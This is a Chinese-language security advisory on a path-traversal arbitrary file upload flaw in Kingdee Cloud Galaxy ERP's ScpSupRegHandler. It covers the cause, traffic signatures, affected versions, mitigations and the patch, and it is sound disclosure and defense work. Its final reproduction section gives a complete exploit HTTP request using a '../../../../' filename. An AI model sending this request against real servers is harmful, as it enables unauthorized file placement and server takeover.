金蝶云星空ScpSupRegHandler任意文件上传漏洞

金蝶云星空是一款云端企业资源管理(ERP)软件,为企业提供财务管理、供应链管理以及业务流程管理等一体化解决方案。

2023年11月,互联网上披露金蝶云星空任意文件上传漏洞详情,攻击者可利用该漏洞上传任意文件,获取服务器控制权限。该漏洞利用简单,EXP 已在互联网公开,建议受影响的客户尽快修复漏洞。

漏洞描述

漏洞成因

文件上传功能在Web应用程序中极为常见,但也是安全隐患的常见来源。在此次漏洞中,关键问题在于对上传文件的后缀验证不严格且路径处理不当。虽然该功能旨在接收用户上传的文件,但由于未对上传路径和文件后缀进行严格的验证和过滤,攻击者得以通过构造的文件名(如使用"../../../../"等路径穿越技巧)将恶意脚本文件上传至服务器上的非预期目录。

利用特征

从流量层面来看,该漏洞的利用特征体现在异常的HTTP POST请求中。在正常情况下,文件上传功能的使用应仅限于预设路径。然而,在攻击流量中,可以观察到文件名包含了旨在越过目录限制的payload。这些请求通常以多个连续的"../"序列出现,这是路径穿越攻击的典型标志。

漏洞影响

这一漏洞的成功利用可能导致多种安全风险。首先,攻击者能够在服务器上的任意位置上传文件,这可能用于植入恶意软件或篡改现有文件。此外,通过上传特定的脚本或执行文件,攻击者可能获得服务器的进一步控制权。最严重的情况下,这可能导致服务器的完全接管,敏感数据泄露,甚至将服务器转化为发起其他攻击的跳板。

影响版本

金蝶云星空企业版私有云、企业版私有云(订阅)、标准版私有云(订阅)三个产品 V6.2(含17年12月补丁) 至 V8.1(含23年9月补丁)

解决方案

临时缓解方案

在确认不影响业务的情况下,暂时禁用受影响系统的文件上传功能,直到使用升级补丁。

如非必要,不要将 受影响系统 放置在公网上。或通过网络ACL策略限制访问来源,例如只允许来自特定IP地址或地址段的访问请求。

升级修复方案

官方已发布新版本修复漏洞,建议尽快访问官网(https://vip.kingdee.com/article/505394681531036160?productLineId=1&%3BisKnowledge=2&isKnowledge=2)或联系官方售后支持获取版本升级安装包或补丁。

漏洞复现

通过漏洞利用,上传恶意文件

POST /k3cloud/SRM/ScpSupRegHandler HTTP/1.1
Host: ip-port
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=zsqxokga
Accept-Encoding: gzip
Content-Length: 276

--zsqxokga
Content-Disposition: form-data; name="dbId_v"

.
--zsqxokga
Content-Disposition: form-data; name="FID"

2022
--zsqxokga
Content-Disposition: form-data; name="FAtt"; filename="../../../../uploadfiles/ccc.txt"
Content-Type: text/plain

ccc

--zsqxokga--